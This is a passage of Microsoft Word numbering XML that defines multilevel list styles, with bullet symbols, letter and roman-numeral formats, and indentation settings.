      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="28A491AC">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="D5E40DC4">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="6DF032D6">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="32" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="1DDB0E41"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="274A8A90">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperLetter"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="43768C8A">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="08F4CE5E">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="75A26060">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="E098C26A">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="16028C88">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="B38218C4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="8DBA9010">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="3F1C612C">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="33" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="1FD02A01"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4920D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11564BB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A0AA45D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22A83E94"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="5D527B7C">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperLetter"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="AEB4E2E8">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="7F7A0538">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="959CF526">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="684821DE">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="C2222A22">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="AA76FFD2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="D004ADC4">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="E4F8A798">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="36" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="23495194"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="C5CE2DCC">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperLetter"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="30A0D680">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="7924FD9E">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="26B43E08">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="111E26E8">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="EE22498C">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="DB1EC806">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="28B64810">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="E3E422BE">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="37" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="24CC6D2F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CD26C078"/>
    <w:lvl w:ilvl="0" w:tplc="48E4EADC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="8C2AA560">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="D514F24E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="51102BEE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="C59ECADE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="401621FC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="340ADC1C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="BDA29426">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="0ABC1C9E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="38" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="251F4A76"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="06F8C7E4"/>
    <w:lvl w:ilvl="0" w:tplc="B2A27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D521CF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="85966D9E">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperLetter"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="AA74AFEA">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="44107D26">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="BC0EECDA">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="FD2E8A34">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="58A63B42">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="C028591A">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="C3D67080">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="4986050C">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="40" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="265A111A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="199E4886">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperLetter"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="8DAEF65A">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="7C3EBB98">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="6E30BE02">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="DD06BBDC">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="7C0C47A6">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="F80EE908">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="5D24841A">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="4C084516">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="41" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="2B755E05"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="57FE0CF4"/>
    <w:lvl w:ilvl="0" w:tplc="50CCF30C">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="240C42FC">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>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B9D6B40"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A6360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BA50F11"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="621E8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C0A33A2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E092D93C"/>
    <w:lvl w:ilvl="0" w:tplc="6136B35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CF52C5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3954C8F4"/>
    <w:lvl w:ilvl="0" w:tplc="D2EEAABC">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="7624D6C0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="39E2E4F4">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="046C2610">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="8E42ED14">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="CB0AF060">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="5A9ECDDC">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="F11E9798">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="494E83BC">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="46" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="30770D30"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="5F4C6394">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperLetter"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="B8EE04C4">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="32BA91F6">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="063EE632">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="A20C1C04">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="4DAC1F4A">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="E55A7024">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="7B806006">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="64D0FE8C">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="47" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="30F42B69"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0F92D0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1D56984"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A2D2D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21D39CA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="8694541C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="4F222208">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="EA2429B8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="FFB4266E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="C7AEF6BC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
